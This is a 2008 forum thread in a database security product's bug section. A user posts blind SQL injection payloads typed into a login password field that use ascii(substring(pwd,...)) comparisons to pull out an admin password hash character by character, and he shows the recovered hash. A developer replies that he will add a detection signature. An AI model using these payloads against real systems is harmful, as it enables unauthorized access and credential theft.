HomeForumsBugs
 Database Security. Database Auditing. Database Caching. Database Masking. Get it now

YYEEEESSSS! I'l do it! (2houres)

Posted August 2nd, 2008 by eLWAux
in

name: admin
password: blabla') OR ascii(substring(pwd,1,1))>('50 - (+)
password: blabla') OR ascii(substring(pwd,1,1))<('52 - (+)
password: blabla') OR ascii(substring(pwd,1,1))=('52 -(-)
password: password: blabla') OR ascii(substring(pwd,1,1))=('51 - 2 (+)
пfirst symbol: 2
blabla') OR ascii(substring(pwd,2,1)).. secont symbol ....
etc..
in the end:37fa265330ad83eaa879efb1e2db6380896cf639
SHA('pwd')=37fa265330ad83eaa879efb1e2db6380896cf639 its TRUE!!!

YEEEEESSSS!
icq: 354 - 345 - 367

‹ SQL Bypass Installation blocks "drop/create" but allows destructive SQL through ›

Comments

Hi eLWAux Thank you for your

On August 4th, 2008 yoav says:

Hi eLWAux

Thank you for your email!!!

I will add custom signature for substring() function as a one that can be used to brute force database contents. The fix will be available in the next application release.

Thanks again,
Yuli

I registered just to ask:

On August 21st, 2008 enatefox says:

I registered just to ask: ascii(substring(pwd,1,1))=('51 - 2 (+)

I can't find anything on what's after the '=', what's the function and what is the plus sign doing?

Back to top